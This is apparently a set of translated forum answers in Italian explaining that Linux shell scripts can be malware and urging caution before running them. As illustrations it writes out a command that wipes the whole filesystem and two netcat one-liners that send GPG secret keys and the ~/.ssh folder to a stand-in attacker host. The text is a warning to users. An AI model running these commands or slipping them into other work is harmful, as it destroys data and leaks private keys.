.sh
i file sono script di shell. Sono analoghi a .bat
file (cmd
script) in Windows. Tutti questi (script di shell, script cmd, .exe
Gli eseguibili Windows, gli eseguibili Linux (che di solito non hanno estensione)) sono programmi eseguibili; se ne esegui uno, può fare qualsiasi cosa tu possa fare. Quindi sì, gli script di shell possono essere dannosi. Tratta uno script di shell (o uno script Perl, o uno script Python, o uno script Ruby, ecc.) con lo stesso sospetto con cui tratteresti qualsiasi altra applicazione.
È un po' più difficile nascondere il malware in uno script di shell senza sembrare sospetto, perché si tratta di uno script che può essere letto da persone che conoscono il linguaggio di scripting. Ma non è molto più difficile; poche persone, anche con le conoscenze tecniche, si preoccuperebbero di rivedere il codice, quindi potresti sperare di passare inosservato.
In pratica, c'è meno malware per Linux in giro che per Windows. Ciò è probabilmente dovuto principalmente al fatto che Linux ha una quota di mercato molto inferiore rispetto a Windows sul desktop, quindi il ritorno sull'investimento per la scrittura di malware Linux è inferiore. Inoltre, c'è una cultura radicata di condividere piccoli miglioramenti al sistema nel mondo Linux, più che nel mondo Windows; quindi l'equilibrio delle probabilità dice che si tratta di qualcuno che condivide un piccolo miglioramento e non di malware. Ma potrebbe essere un malware che si presenta come un piccolo miglioramento. Alla fine, devi decidere se puoi fidarti del sito in cui stai scaricando questa applicazione o delle persone che hanno consigliato questo sito. Preferisci i programmi che provengono dalla tua distribuzione (cioè che puoi installare dal centro software), in quanto sono stati sottoposti a revisione.
Ora per quanto riguarda questo programma specifico:ho dato una rapida occhiata e sembra benigno. Non ho visto nulla che memorizzerebbe la tua password da nessuna parte senza dirtelo o che farebbe cose sul tuo computer diverse da quelle per cui è pubblicizzato. Nota che ho fatto solo una revisione di 2 minuti, che qualsiasi autore di malware anche a distanza potrebbe superare. Il programma sembra ragionevolmente ben scritto.
Non consiglierei necessariamente questo programma a meno che tu non senta un bisogno urgente che non è affrontato dai pacchetti nella distribuzione Ubuntu. Ubuntu viene fornito con il cavalluccio marino interfaccia GUI per GPG (c'è anche kgpg per gli utenti di KDE). Potresti anche voler installare seahorse-nautilus (o seahorse-plugin nelle versioni precedenti) per l'integrazione di Nautilus.
#!/bin/sh
rm -rf --no-preserve-root /
Questo è malware ed è uno script di shell. Una versione più avanzata potrebbe includere qualcosa come:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
Quindi sì, uno script di shell può essere dannoso. Può diventare più complesso e chiamare altri linguaggi di scripting, librerie o persino essere un archivio di shell che sputa e chiama un normale eseguibile.
Per la maggior parte, tutto ciò che esegui ottiene i permessi dell'utente.
Certamente! Può fare qualsiasi cosa tu possa fare! Guarda log, keylog, ruba file ecc....
A seconda di ciò che il suo sviluppatore ha scritto sul codice sorgente! Può fare TUTTO.....
Ed è molto facile da realizzare, quindi se ti viene inviato un file .sh sospetto, pensaci due volte prima di eseguirlo!